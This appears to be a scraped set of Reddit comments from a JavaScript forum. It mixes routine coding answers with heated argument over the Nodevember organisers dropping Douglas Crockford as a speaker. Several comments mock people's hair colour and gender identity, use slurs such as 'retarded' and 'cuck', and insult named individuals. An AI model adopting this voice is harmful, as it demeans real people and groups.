I'm not sure what you mean by 'getting the SVG content'. Do you want the coordinate positions of the SVGs in JavaScript? Do you want to rasterise the whole thing into a `&lt;canvas&gt;`? Or do you just want a container SVG with the DIV and its SVGs? I'm not sure if it's possible, but if it is then I would suggest looking into SVG's `&lt;foreignObject&gt;`. You could have a single SVG container that looks a bit like, &lt;svg&gt; &lt;foreignObject&gt; &lt;div&gt; &lt;svg&gt;..&lt;/svg&gt; &lt;svg&gt;..&lt;/svg&gt; &lt;/div&gt; &lt;/foreignObject&gt; &lt;/svg&gt; (this is invalid SVG but hopefully you get the idea) Then essentially you have an SVG of the content using browser rendering. Most SVG editors (Inkscape) don't understand `&lt;foreignObject&gt;` but many browsers do, and it's valid SVG. That single SVG could be put into a `&lt;canvas&gt;` and saved to PNG. See [putting DOM content into SVG](https://developer.mozilla.org/en-US/docs/Web/API/Canvas_API/Drawing_DOM_objects_into_a_canvas) for more. Another approach would be to use PhantomJS and Print To PDF, and then convert that file to SVG. That would get you a flattened SVG without `&lt;foreignObject&gt;`, and so common SVG editors would understand it. If you do just mean getting coordinates then I guess `getComputedStyle` would do it, although I haven't looked into doing that with SVG files I'd guess that would still work.
Like others have mentioned, I think you're being a bit hard on yourself. You should find a way to practice more mock or real interviews. If you don't mind more algorithm problems, I've found mock interviewing on pramp to be a really good resource. With enough practice, you'll desensitize yourself to the interview process and breeze by in no time.
Do you need to create a pdf with editable fields or just fill out a pdf that has editable fields?
If I knew that the key to better code was more social justice I wouldn't have wasted all that time and energy on a worthless CS degree. /s
Wow, I'm surprised a company as big as salesforce would tolerate someone like that. I'd think shit like this has a very real chance to hurt their image in a way that would cost more than whatever they bring to the table.
They were already digging for things to complain about... they'd also started complaining about the venue being Lipscomb University (Christian school in Nashville). But everyone latched on to the Crockford part... and here we are. I _do_ still feel bad for the organizers.
Perch's words exactly on codes of conduct: "Oh you're going to kick somebody out the first time for saying something wrong. I have never seen an application of the code of conduct that way.... We're not on a hunt for somebody to say the wrong thing and kick them out. Were merely trying to create a safe space for the people aren't here, but we want them to be here" Crockford didn't even get a chance to say a word. https://youtube.com/watch?v=edYnouynBxg This lecture is incoherent. I've seen sixth graders deliver a more continuous train of thought than Perch. Shows off LED belt you can tweet at to change its color, proceeds to stand behind a podium the whole time. What a loser regardless of gender.
I agree, I was a bit vague there. What I was really trying to get at was that that expectation should be a warning; you might be able to skate around it in an interview, but if the expectation still holds when you start the job, you're going to be in trouble. That said, interviews are very unlike actual working relationships and behaviors, on both sides of the table. I remain convinced that most people (myself included) just don't know how to reliably conduct effective interviews.
Lol all of his/her videos have hundreds of downvotes.
I'm not sure what they bring to the table, aside from annoying 95% of JS community and developers, and long whiney medium posts. I'm sure they are good at attracting their own type -purpled haired people that prefix their name with Mx because it's gender neutral as they tell each other the world hates them. Silly small people.. 
No Dev Ember!
Well overdue, either that or Salesforce show her the door/gutter - I'm sure most of their developers (who seem reasonable people) would be silently rejoicing.. 
I think more people seeing that video is a good thing. I just dropped into [a part](https://youtu.be/tBRGMcdAKzs?t=7m28s) where she says: "I wanna carry and air-horn around for any time anyone of a non-marginalized group says "well actually" to person of a marginalized group. I wanna take that air-horn, place it to about 4 to 5 inches away from their face &lt;*makes gesture and air-horn sound*&gt;." From seeing that video it gets obvious that her cause is one fueled by aggression and anger. There is no compassion. That is *not* how you effectively fight for social change.
&gt;how does Angular achieve two way data binding". My reply - "Dirty checking?". He said, yeah, but could you tell me how the framework implements dirty checking. I had no idea, and I completely messed up.
&gt; The whole point of using libs is that you understand the high level concepts but you offload the work of implementing / maintaining to others I don't agree with this at all. When bugs occur and you aren't able to pinpoint what the bug is / causing it or are even using the framework poorly because you don't understand fundamentally how it works is a terrible way to run things. 
&gt; as they tell each other the world hates them Don't we, though?
I can read fine. There's no reason to quote the previous post. Angular 1 is a different framework than Angular 2 and doesn't have 2 way data binding. The question you posted even mentions something about what the difference is. Did you even read it?
&gt; He said, yeah, but could you tell me how the framework implements dirty checking. WTF are you talking about. He quoted right here as saying this. 
I did some hiring myself and found that "Hire for attitude, train for knowledge" works best, if somebody makes a decent programmer, they can learn anything, but you be surprised how many programmers just know angular, or just know &lt;insert framework flavor of the month&gt;. Also, i never ever ask a candidate about internals of a framework, reason is, if you need to know about internals of a framework, its a shitty framework. As i read it, you did fantastic cause you have shown that not only you know your tooling, but you understand the underlying concepts so well you were able to implement them yourself. If it was me, i would have made you a offer on the spot!
Wow. Who the hell wants to go to a tech conference with this kind of content?
no where in op's post does it mention angular 1 anyways. 
Why does it have to be alarming? A conference has a limited lineup, any person chosen means other people are not chosen. If they want other people more, they can change lineup without having anything at all against current choices -- just because they feel their attendees (who are their customers) would like it more. The people that are seen as dangerous are banned from conferences, but that's unrelated to what happened here.
new favorite frontend lib
\#cats
I don't see boycott as a threat unless significant amount of attendees cares about having all-male lineup and is ready to change plans based on that. But if they do, then the change made sense for the organizers. Consider the case of people boycotting PAX conference as a counter-example. The boycott is high-profile, but there doesn't seem to be a significant effect on the conference -- why? Because a majority of attendees doesn't care. Boycott isn't much of a leverage unless the majority shares the sentiment. &gt; I dug and I dug and I dug for this. On this point, in my professional experience I have seen many cases where people couldn't stand some other people. Often it was well-deserved, sometimes it wasn't. But it was never something you would find by public digging. And the people being disliked often didn't know about it either -- either because they had inflated opinion of themselves, or because they were blind to social cues. That's why I say a direct approach is refreshing here and gives people chance to reflect. It's likely that the organizers will tell Crockford what the problem is if he asks, but airing it publicly is not productive. As I said, it's unlikely to be anything too terrible.
I wouldn't be so sure, it reads like your right to use React is revoked as soon as you *compete* with Facebook (and potentially with other companies using React), however that is defined. And that's the point, I can not decide whether this concerns me or not - I'm not a lawyer and most likely the OP isn't either, hence my recommendation not to ignore this. I'm not trying to put anyone off, just be cautious on what technology you build your business. P.S.: The many big companies using React (Microsoft, Mozilla, ...) all have their own legal deparments that obviously greenlighted the usage for *themselves*
so what is this requestAnimationKeyframe and how does it differ from requestAnimationFrame? 
It's not efficient to memorise the sum total of human knowledge.
no, it isn't. saying you don't know is fine. but every now and then, you get to interview the guy that not only knows the answer, but can re-implement or improve it. asking everyone what hoisting is or diff between call and apply will only take you so far. also, it can lead to a discussion: so, you haven't looked into it, that's fair enough. if you had to detect change, how would you do it, what challenges are there etc 
For what, telling the truth?
what is it with your attitude, though--you don't know all the things but somehow feel it's ok to whine about the unfair and difficult questions you were being asked? you also stated that "Indians are terrible at interviewing" go and read up instead. own it. become better. you should cherish discussion and challenging problems, not look for sympathy. remember, the point of these interviews is not only to test knowledge but how you deal with issues outside of your comfort zone. 
I can only recommend https://github.com/wprl/baucis. Author is currently doing a rewrite for 2.0.0 version so I think it's going to get only better in the near future.
You are going into a quotes hell with this approach. Why not use javascript to create dom elements as such: var tr = document.createElement('tr'); var commentor_td = document.createElement('td'); var audio_td = document.createElement('td'); var dateposted_td = document.createElement('td'); var audio_el = document.createElement('audio'); audio_el.setAttribute('control',true); audio_el.src = "https://website.com/"+audio_path; commentor_td.innerText = commentor; dateposted_td.innerText = dateposted; tr.appendChild(commentor_td); tr.appendChild(audio_td); tr.appendChild(dateposted_td); audio_td.appendChild(audio_el); $("#commentsTable tbody").append($(tr)) Even if it seems like an overkill, you will find it extremely adjustable and flexible later. Also I sometimes end up having a mix of document.createElement and html inside script so that I don't over complicate it and at the same time have a maintainable code. 
Maybe you have to escape the strings. See the escape() function or as you seem to use jquery, use its ".text()" function.
I kind of agree, but I still like react, and am not really forced to use all the stuff out there. It could either continue to be a struggle, or a learning opportunity. Make something that eases your pain, that's usually how it goes. I do have issues with how much the syntax has evolved with every release, but that's probably less a react thing than a mirror of all the more recent renditions in JavaScript in general. After finishing my current project I'm diving into elm... maybe you should look that way.
These kind of tests are like taking an Uber driver to downtown St. Louis and asking them to drive from Market Street to Main Street, map both sides of the street as fast as they can and provide a detailed list of all of the hottest and latest bars, bistros and nightclubs along with their 5 star rating status in order to prove they know the streets of Seattle, where the Uber driver's services will be provided; the same city where the potential Uber driver was born and raised; where they know every alley and dock. But, noooo! Let's make certain they are a competent driver: **Tester:** "What is the hottest new bar downtown, where is Billy G’s, and how do you get to the Chophouse? You got 20 minutes to take me there. Feel free to ask me any questions." **Applicant:** "But sir, we're in Seattle and Billy G’s is in Kirkwood, MO." **Tester:** "Aha! You don't understand what I want you to do! I wasn't asking you to take me to Billy G's, I simply asked where it is. What I want you to do is take me to BaiKu Sushi Lounge. It's in Midtown, but you probably didn't know that. And I want a detailed list of the route. And we have to take the Kingshighway Bridge to get there." **Applicant:** "But the Kingshighway Bridge is closed for construction." **Tester:** "I'm sorry. Time is up. I guess Missoula, Idaho is close enough. Don't call us, we'll call you."
It's awfully generous of you to refuse to take your own side in a fight, but that doesn't create the obligation on others to behave the same way. As far as not being good people, this is the same bunch who have been swarming and mobbing other conferences and open source projects for some time now, demanding the removal of people they don't like for reasons that are trifling, obscure, or sometimes never revealed at all. They are bad people.
If it's justified, the prestige shouldn't matter one way or the other. But there should be due diligence done for every case before you toss someone.
Only people without the moral high ground are jerks, though. You should try always having the moral high ground, like Perch does. Then you can self advertise about being unrepentant, and treat people like they're inferior while you talk about equality, and not have your head explode.
What's the story here? 
Off-topic but.... Twitter is so annoying for writing longer posts / multiple tweets like that. Can't link to it in any way so people have to take photos of it, if they want others to get the correct order.
This is a retail job, not an IT job. He wouldn't have gotten a job at Hollister at the mall either. 
Crockford was uninvited as a keynote speaker at nodevember recently. The organizers said they wanted everyone to feel welcomed and some speakers had said they wouldn't speak if he was there. After public scrutiny little hard proof was found, but different camps have started to form over the ideological differences. Should projects shun contributors who are good programmers but are considered bad people by project maintainers? And what is the test for a bad person? I think that's the two main questions floating around this topic. I could be wrong but that's my current understanding. 
"Cry-bully" instead of "Cry-baby". Heard that term somewhere. Should be used more.
And you realize that you're currently advocating against HIS liberties...?
Well that's grossly sexist.
Thing that always make me laugh it that tweet length limit, so everybody need to tweet few times in the row or use external service.
https://www.reddit.com/r/javascript/comments/51e2jb/nodevember_organizers_steps_down_i_did_not_and/d7b9k7r *Two people* - who never bothered with evidence. Not to mention that even without any of the information we actually *did* get your comment is really shameful: If there is no evidence, just "trust"? This is stupid beyond comprehension. I'll remind you of your statement that next time you call for evidence when you happen to *not* agree with something. And read https://www.reddit.com/r/javascript/comments/51gexo/on_nodevember/
"Some speakers" seems to be two people, at least one of them known for strange behavior, and no evidence. https://www.reddit.com/r/javascript/comments/51e2jb/nodevember_organizers_steps_down_i_did_not_and/d7b9k7r https://news.ycombinator.com/item?id=12434422 And read https://www.reddit.com/r/javascript/comments/51gexo/on_nodevember/ Best quote: "This is the most cowardly apology I've ever read"
You are full of bullshit.
Make sure your JavaScript is evaluated *after* the element you're targeting is created e.g. wrap it in a ready() or use a self executing function before closing the document &lt;html&gt; &lt;head&gt; &lt;/head&gt; &lt;body&gt; Your HTML here &lt;script&gt; // self executing function here (function() { // your page initialization code here // the DOM will be available here })(); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; [edit] [Source](http://stackoverflow.com/questions/9899372/pure-javascript-equivalent-to-jquerys-ready-how-to-call-a-function-when-the?answertab=active#tab-top)
&gt; I see this is also at a node-event. Does nodejs just attract these kind of terrible people? Script language conferences do, for some reason. JavaScript, Python, Ruby, PHP. There's always excessive talk about inclusiveness, and sorry to be whatever-ist, but it makes an impression on me that at these conferences there's always these "socially focused" people, almost always women or trans women, sporting brightly color hair, telling everyone we should feel guilty for all the pain we unknowingly cause to everyone around us. Why is this a pattern, I have no idea, I'm merely observing it. Mind you [I'm not saying that women and trans women are likely to be SJW](https://en.wikipedia.org/wiki/Association_fallacy). Good specialists come in all shapes and forms. SJWs are a small vocal minority that, for some reason, comes in specific shapes and forms. Script languages are more accessible, and easy to work with, so the focus of people, I notice, tends to be the social mechanics around working with scripts in teams. The focus of people who write C++, Haskell, Erlang and so on tends to be programming, instead. Script languages spawned the "brogrammer" movement. The "social justice warrior" movement was the response. Eventually, either we'll learn to act professionally and leave this bullshit behind us, or we'll simply have to accept that these programmer conferences are not for actual programmers.
Oh man. That "apology" is embarrassing to read. I feel like its this same problem that keeps cropping up. Everyone exists in their own supercharged echo-chamber news-feed-driven world. They get used to their extremist views being supported by their followers, and then go out into the real world and start spouting them. But like, in the real world some degree of compromise is usually necessary, and sometimes you end up being wrong and you have to retract what you said. But when you go all the way to the wall in your opening remark, its nigh-impossible to retract your statement and and when you turn out to be wrong. This apology sucks. I'm embarrassed for the author, and I'm embarrassed that this situation even exists. We, as a community of software engineers, are supposed to be intelligent, rational, and objective people. This is anything but. 
Have a look at [what I wrote here](https://www.reddit.com/r/programming/comments/511i0j/pep_530_asynchronous_comprehensions/d78ym01?context=3) (it's an OT side-thread, the rest of the thread is about something completely different). It's just an example of course, not a complete explanation. It also becomes clear that Javascript may not be the place to use it effectively - also see https://hughfdjackson.com/javascript/does-curry-help/.
The 'item' var is hoisted and evaluated only once. If your DOM is not ready when this happens, then *item* will evaluate to an empty collection. You can work this around by creating a function that returns the item, then call the function from within your setInterval.
Something like this? &amp;nbsp; function checkItem() { var item = document.getElementsByClassName("item-thumb"); return item; } &amp;nbsp; If I open the website, wait, put in this function and then call it by hand with *checkItem()*, I get no results. &amp;nbsp; Once again: If I open the website, click the inspector and then put in this function and run it by hand, it finds the element. &amp;nbsp; The thing I don't understand is: I am putting the code into the console by hand, seconds or minutes after the website is loaded and I can clearly see the element being there - the DOM is fully loaded at this point. There will only be results when I open the inspector and "see" that the element is there. &amp;nbsp; **This is a console log from one time opening the website and running the code:** &amp;nbsp; function checkItem() { var item = document.getElementsByClassName("item-thumb"); return item; } --- checkItem(); [] // no result --- (At this point, I open the inspector and see, that the item is there and should be found - call the function again...) --- checkItem(); [ &lt;a class="item-thumb" ng-repeat="collectSlot in slot.collectInv"&gt;...&lt;/a&gt; ] // result
Idk what all the fuss has been about tbh. Personally really excited for cuckvember 2016
Double standard, because now you are on the receiving end? You defend people who were anything but nice to a guy who didn't deserve such treatment - which is the majority opinion by far it seems. i suggest you clean up in front of your own door, then I'll gladly follow your *example* - not your words. Not to mention that you chose to ignore the facts: We know quite a lot, if you read all the posts. Even one of the people actually responsible admitted that they didn't have any evidence whatsoever, they just didn't like DC. Which, given what we've learned of just that person (if you read the comments) isn't anything worth taking seriously (https://www.reddit.com/r/javascript/comments/51gexo/on_nodevember/).
41minutes from HSJW's tweet to the announcement that Crockford was dropped. Not a lot of time to do diligence 
No, /u/AcceptingHorseCock has spoken carelessly. The reason people believe that due diligence was not done may be in part because the organizing committee as a whole does not appear to have discussed or taken part in the decision, according to Kevin Old. This view *does* seem to be borne out by the nebulousness of the proffered evidence and the ["leaked"](http://pastebin.com/3mQc7DfG) slack transcript in of the conversation in which the volunteers [if i recall correctly] were informed of the decision. As per Old's post, [Paul Straw's analysis](https://paulstraw.svbtle.com/crockford) seems to be generally accepted as the most thorough explanation of the circumstances.
&gt; So React "forces" a way to write apps that helps reduce bugs, is quite good idea but is verbose and not portable to non-React environments. I can't connect what React does with what you say. How is it verbose and non-portable? Typically a component has logic for three distinct events in its lifecycle: - Create - Update - Delete What React does is allow you to skip the "Update" logic, which often grows into a complicated error-prone state machine, by re-using your "Create" logic and diffing virtual DOM to make updates efficient. Check functional components if you want to be less verbose, the "classic" React components seem to be going out of favor, maybe that's what you call verbose?
To save people from having to actually follow a link and read it, he comes down solidly on the side of Crockford after researching all mentioned "incidents" and finding nothing but misrepresentations of what Crockford actually said, and his summary is &gt; After doing all my research, I was left a bit baffled. There still seemed to be a distinct lack of information about what had actually happened here. I decided that it would make sense to contact Mr. Crockford directly and see if he had anything to say... Crockford's response: &gt; It is a mystery to me too. Of course, by now [we know there *was* nothing else](https://www.reddit.com/r/javascript/comments/51gexo/on_nodevember/). (same link as I posted above).
I'm surprised, I didn't realize that the time frame was that narrow. That being the case, I have trouble seeing how that could have been the start of the matter. It makes me suspect that the organizer had already gotten some flack from people who didn't want to present at the same conference as Crockford, and he used this as cover.
That doesn't make a lot of sense. So, when you or one of your team members makes a mistake, the whole project deserves to fail?
Well same with React. It's just that boilerplates are usually dumping all this stuff in. Op made the assumption this is going to be easier when Angular 2 is ready, but from what i've seen it's the same if not harder as TS is pretty much part of most tutorials i've seen.
&gt; People who are fighting to remove freedom need to be fought not mildly accept their different opinions. If paying for a campaign is "fighting" then to fight back means to pay the opposing campaign, not slandering someone, painting them as a monster and isolating them from social events simply for having their opinion. You're totally out of hand, using words like "advocating", "fighting", "cruel and oppressive" to describe someone who made a one-time payment to support his opinion during *democratic debate*. If democracy to you is to ask for the head of those you disagree with, I'm afraid you have critically misunderstood democracy.
Nice claim, got any research to back that up though?
you keep saying "they". Actually it was just one single organizer who decided on it all on his own, resulting in at least [one co-organizer stepping down](/r/javascript/comments/51e2jb/nodevember_organizers_steps_down_i_did_not_and/): &gt;By the time I’d received notice of the event unfolding on the evening of 2016-09-01, the decision was already made by the main organzier, swiftly and without discussion. &gt;This, to me, is not the way to respond.
1. Nowhere in my post did I say anything about the democratic process, I litterally have no idea why you brought that up. 2. "He didn't try to stop marriage equality, he just tried to stop marriage equality" 3. The whole reason for my post was to bring up the other side of the coin, getting shunned in a good light by the community vs in a bad light by the community 
Well I am sad that the other organisers have to suffer, but generally this is not the kind of behaviour I want to see as a member of the JS community. Nodevember's apology was weak at best. The conference's tarnished reputation is the result of two SJWs and the head organiser's decision to act single-handedly. Everyone knows that. The aforementioned reputation changes are merely consequences.
&gt; thrust down from a position I assume this is related to js. Why would you let someone's opinion on marriage dictate whether you listen to their opinion on javascript? People aren't irrepairably tainted black by inolerance, and it doesn't make sense to me to ignore them when in comes to an unrelated, technical subject.
&gt; ask for the head And that's no hyperbole? Using your influence/purse to protest a speaker at a conference is beheading?
Are you positively sure the DOM element you're trying to access is in the source when the page loads ? One thing you can try is to keep the "var item;" outside the function (or not use var at all), so it'll be hoisted as *undefined* to the top of your scope. Then in your function (same scope), remove the "var" : function checkItem() { item = document.getElementsByClassName("item-thumb"); return item; } Then (still same scope): setInterval(function(){ console.log( checkItem() ); }, 1500); 
But "justified" is completely subjective, so I'm gonna say that is a vapid statement.
&gt; He made a one-time private donation in support of his opinion during standard democratic process to clarify what "marriage" means. FWIW, it wasn't private, as it was over the threshold at which donations become a matter of public record.
Actually, one of the organizers, who since quit, told us there was no due diligence, because he wasn't even notified of it happening.
Wait, so we have a special class of citizen, that gets special tax rules and insurance incentives and other legal shortcuts and instant undeserved status? And single people pay for this? Is that what you meant by marriage equality?!? 
Found the SJW
What difference do you think it makes whether he's in charge or "the" organizer or just "an" organizer?
Conferences are not just tech they are also communities. They are also commercial. That's two reasons to avoid homophobic and racist speakers. The sad thing is you're all so but hurt due to excessive identity politics that you can't see the obvious truth in that. 
Whoa whoa whoa, you can't go using the word "black" in a negative context. What is this, the 19th century?
&gt; If you are uncomfortable with another speaker that is called a personal problem, and it is up to you to resolve it directly with that person or privately with the conference organizers. +1
Obviously I'm glad big names are speaking up for Crockford but for the people who didn't want him at Nodevember, Brendan Eich is literally the last person they'd want to have vouch for him.
I dunno about anyone else but I would love to see a response.
I can't speak for all servers, but [Apache](http://httpd.apache.org/docs/current/mod/mod_deflate.html) and [Express](https://github.com/expressjs/compression) enable gzip only for server responses, not in handling client requests. In most use cases, this is all you need, since usually requests are tiny compared to the responses. (I think that some compression happens at the network packet level, but I am not sure. And I am pretty sure that most browsers compress HTTP headers, though request bodies are left as is). So one use case would be if you have a web application that needs to send a very large payload and that payload is likely to compress well (for example, something with lots of text, a serialised JSON structure, an XML document or whatever), you could save a lot of network resources by compressing the payload on the client, sending it as a byte array and then decompressing the payload on the server. If the payload is enormous or the network bandwidth is really precious, this could be a useful tool. (And I actually did this in a side project not that long ago).
Okay, let's stick to "I have trouble seeing how that could have been the start of the matter."
To be fair, the whole " Should projects shun contributors who are good programmers but are considered bad people by project maintainers?" is going for several years, I think. At least since Opalgate.
Wasn't that enforced by SMS limits?
Why does anybody give a shit either way?
It's not unthinkable, it's just stupid.
&gt; He didn't try to "stop marriage equality" You know that's exactly what Prop 8 was doing, right?
As soon as you start funding campaigns to remove peoples right to be treated equally you lose the keep quiet and respect others position. Of course if we were all broadcasting our thoughts all the time no one would come out smelling of roses. But we keep our hateful thoughts to ourselves and our drinking buddies. Once you turn your hatred of gay people into a public position. You invite people to say you are no longer invited to this public event.
No, I'm not arguing that due diligence was perhaps done. What I am saying is that I have trouble imagining a scenario in which (a) the lead conference organizer gets a tweet with a brand new idea, and (b) 41 minutes after encountering this new idea, the lead conference organizer decides that this is something he should do without consulting any of his co-organizers. 
The context was Brendan Eich's firing* from Mozilla, not Crockford's disinvitation. 
&gt; Note: This is a throwaway account. I wouldn't feel safe telling this story under my real account knowing how easy it can be to have a mob of witch-hunters twist your words/intentions and affect your standing with colleagues and your employment in this industry. This right here is the biggest problem we should be fighting. Why the fuck does this person have to fear their life being ruined by speaking out about a terrible person? Holy shit.
That does seem to be exactly what happened, though.
You could take a look at http://scrollmagic.io ([examples](http://scrollmagic.io/examples/index.html)). The example site you provide also uses a form of scroll snapping (which is [coming soon to CSS](http://caniuse.com/#feat=css-snappoints)).
So a few points: + I strongly prefer and really only apply with small to medium companies. The sort of companies where you can talk to people about things and, you know, it'll be a nice discussion and not "well according to HR Policy 23.41..." + Often times it can be enough of a flag for me to not pursue an offer any further at all (and I always indicate that I'm no longer interested in the opportunity as politely as possible, nobody likes to be ghosted on) + When I do still want to apply with a company, I offer my github profile which is overflowing with projects from real life FOSS apps to demos for other companies. I also offer to help suggest or restructure other opportunities they can do in an interview. At least so far, this has worked for me pretty well. I suspect some of that is because I tend to be a bit more senior in the roles I seek, so negotiating and discussing are desirable qualities in candidates. The few cases where this hasn't worked have been places that weren't a great fit, and I should of called it sooner.
Well...this is what the html looks like... &amp;nbsp; &lt;body&gt; &lt;iframe src="..."&gt; ... ALL CONTENT ... &lt;/iframe&gt; &lt;/body&gt; &amp;nbsp; So yeah. The whole content of the body (including my element) is inside an iframe. &amp;nbsp; Any hint on handling with this? 
We cant let some women ruin someones image with lies. Especially one that has contributed a lot. 
&gt; I don't see boycott as a threat unless significant amount of attendees cares about having all-male lineup and is ready to change plans based on that. But if they do, then the change made sense for the organizers. I'm getting articles mixed up but it sounds like it was a rash decision, something I either said or implied in a previous post (&lt;1hr between threat and ban). Mind you, I said a lot of things, kind of seems likely any outcome would have made me right in some ways. &gt; On this point, in my professional experience I have seen many cases where people couldn't stand some other people. Often it was well-deserved, sometimes it wasn't. But it was never something you would find by public digging. And the people being disliked often didn't know about it either -- either because they had inflated opinion of themselves, or because they were blind to social cues. I've been on the receiving end of this. Different field completely, was learning the forklift so gave one of the few girls a weird stare while driving (the reality is I just really didn't want to hit her - efficacy of this technique is terrible, but it's what inexperienced seem to do). But I knew I had an awkward stare moment - these things happen in life. Made up things about smell, in which I started taking 1hr showers in the morning (and using third party verification of smell) AND deoderizing every hour at work. Nah, still. Was eventually let go. Only there for two weeks before I was let go. I did try to note the possibility that I gave the girl an odd stare. She ultimately had seniority though. Edit: &gt; That's why I say a direct approach is refreshing here and gives people chance to reflect. It's likely that the organizers will tell Crockford what the problem is if he asks, but airing it publicly is not productive. As I said, it's unlikely to be anything too terrible. Yeah, I'm interested in procedure here. Oddly though, there's not much you can do before the head guy not even meeting with the other core members before removes a prominent figure for a lineup. No amount of policy can change that, except maybe a stern, "unless life-threatening, decisions are to be made by committee". Slack can make a policy pretty lax for day to day event decisions. "Going to add Person A to the lineup at 1:30. You have until tomorrow to object". That can make for fluid autonomous changes. It's sort of assumed now that slack and friends are used.
The most insane shit is there's huge diversity in open source projects. You can be 10 years old and contribute and no one ever has to know. 
From about a month ago: [Any good JavaScript blog to check daily?](https://www.reddit.com/r/javascript/comments/4wwc9z/any_good_javascript_blog_to_check_daily/)
The community is bored with JavaScript and is stirring up drama to entertain themselves.
Watching two brands of SJW duke it out like this is a lot like watching two retarded dogs fight each other over a tennis ball that didn't actually get thrown except it's not at all entertaining. Just as productive though!
happy to help, been there too :-)
That's your anecdote here's mine out of all the women in the office the one with the colourful hair is the only one I would avoid (she's not a SJW I feel I should make it clear) 
JusticeScript would be a good name for one of those joke languages.
Same here, until then looking forward to more downvotes.
I'd be honored to be such a developer.
It looks like they made a bad call. To me incompetence on the part of a conference organizer is a lot easier to imagine than outright misogyny (which really ought to go beyond mere sexism) on the part of Douglas Crockford.
I'm curious.... what do you actually get for being married in the US? I thought it simply doubled the amount of income your household could earn before entering a certain tax bracket, and stopped people from being compelled to testify against their spouses. Everything else.... really looks like it could just be covered under contract law.
&gt; Blindess, Deafness, Muscle spasms etc can all be real problems and obstacles to using computer programs and being part of the community. We should do what we can to include as many people as possible. This is a matter of accessibility, which can be solved with technology. We know what the right answers are and how to design the technologies in such a way that they are accessible by default so that it takes increased cost and effort above the baseline to make them inaccessible. I know this to be true, **because I have solved it myself years ago**: * http://mailmarkup.org/ * http://mailmarkup.org/hcl/hcl1_0-documentation.xsd The web is not like this because most web developers are lowest common denominator stupid shits who fucking cry when you crank up the strictness of HTML to something like XML or take jQuery away. How did we get here, you ask... Well, I am glad you asked. It is because until about 2009 (about a year after JavaScript started getting fast) web technologies were not taken seriously. They were generally considered stupid toys for cute designers who were paid half of what a Java developer got paid. In business web technologies and the web platform were generally considered marketing tools. Look at sites like Amazon and Expedia... yep, retail marketing. Google, Yahoo, and Facebook... advertising media (still just marketing). Back then (and largely still today outside of startups) if its not requiring a massive server farm to perform a single HTTP response its probably garbage with no commercial value... or so the thinking goes. There is no value on the client side unless you pump it full of advertisements and drowning in analytics spyware. If you can solve for that attitude of incompetence you can get accessibility for free and don't have to worry about inclusivity. Inclusivity is not the problem nor the solution.
&gt; but hurt That's homophobic, man. How dare you.
The pattern itself is a brilliant work-around, but for anything more than small experiments, I’d want real modules (transpiled ES6 modules or CommonJS modules via webpack or browserify).
that was fast
[removed]
That's Java. Not JavaScript. Also that's a method in a class for Java. It's missing the class.
What's the question?
ohhh, sorry to waste your time then ;_; 
It's a private synchronized method that returns a String and relies on there being an object named kristian within scope that has a method hasQuestion which returns a boolean value. I'm guessing there's also an inside joke about a person named kristian.
yes, thanks 
You spit vitriol about a previous coworker and brought up Paul Irish for some very strange reason. Sorry I figured you were on a soap box and had more to say.
Same. I have had the displeasure of working with brilliant-yet-insufferable-assholes and I hated every moment of it. If they're eloquent and modest then there isn't much of an issue, but people with those personalities are rarely either and never both. I have a hard time believing Crockford is an insufferable asshole but then again I have never met the man, nor I have heard much other than that he has been a pillar of the community for decades.
The whole point is inclusivity, if OP's post being anonymous shows that it's far from being inclusive, then we're doing it all fucking wrong. All of it.
I kinda get your point, but, as said before, community in FOSS projects are important too. Wouldn't the merit of one good asshole programmer outweigh the harm of driving away a dozen of mediocre programmers?
Well, I would think the debate would be settled as soon as the question was asked, because the answer is unequivocally "no, projects should not shun developers who are considered 'bad people'." The reason being is that the standard for a "bad person" is ambiguous and entirely depends on who happens to be the self appointed moralist. If the current zeitgeist demands that we railroad everyone into such black and white moral standards, we're gonna have a bad time.
&gt; The reason being is that the standard for a "bad person" is ambiguous and entirely depends on who happens to be the self appointed moralist 1. There are projects built by "benevolent dictators", where this approach kinda works. What Guido or Matz says, goes. 1. There *is* still kinda standart for not being a "bad person", and it's basically not being an asshole: not discriminating people, not dropping slurs related to gender, race, sexual orientation et al. left and right, etc.
Hasn't contributed anything?
Why am I learning web development do you think ?
I'm not talking about speaking at a conference, I'm talking about his donation being used against him. We're talking about Eich, not Crockford right now, remember?
If you're really an idiot that might be a bad idea.
What about `const toSlug = value =&gt; value.toLowerCase().replace(/\W+/g, '-')`
Wake me up when Nodevember ends.
Cool. I have checked out those sources before and actually use layers-control with no problem to allow the selection of individual map markers. edit: for more context, check out an earlier version of what I am building: http://mapfile.xyz/webapps/leaflet_freiburg_mobile_beta.html In a newer version I have labels on the control group layers on the right. My goal now of course is to make buttons for the large groups: "classes" and "mensas" I can get the button to show up with the icon I want, and have it work when I press it to show my grouped layer. Unfortunately, I still haven't found a way to allow the clicking of the button again to remove the layer from the map. If anyone reading this wants to offer their strategy that would be cool. Here is my code: https://jsfiddle.net/6zgy0sk0/1/
That's because he's a moronic self righteous coward
It's already been proven. One of the higher ups made a blog post about how he wasn't consulted on the choice made by the head. He actually found out about it via Twitter.
&gt; As soon as you start funding campaigns to remove peoples right to be treated equally you lose the keep quiet and respect others position. That opinion is extremely anti-libertarian. All you have to do to eliminate liberty is silence a minority, particularly when that minority voice disagrees with you. People should be allowed to express disagreement without fear of reprisal lest we be cast into ignorance forbidden from doubt.
The issue is that `^` in JavaScript isn't for exponentiation it's [bitwise XOR](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/Bitwise_Operators#Bitwise_XOR). You want to replace it with [`Math.pow()`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Math/pow)
!function(){ ... }() Less braces, no conflicts due my adversity against semicolons
What does the H stand for? That is a good point. However, they say in their statement that the decision was made on the basis of private communications rather than any tweet.
And that's exactly what I needed to know. Thanks dude, you're a lifesaver - it works like a charm now! That goes to show how much JavaScript I've learned so far...
Tried that before without luck (it gave a different result, but still a wrong one). /u/alexendoo above had the right answer in that I need to use `Math.pow()` instead of `^`. Thanks, though.
Fair enough. I still think it's their event and they can run it how they want though. It's the nastiness I've seen directed at individuals over this has bothered me.
Oh? Are they making homophobic or racist comments while speaking? Are they making those comments at the events?
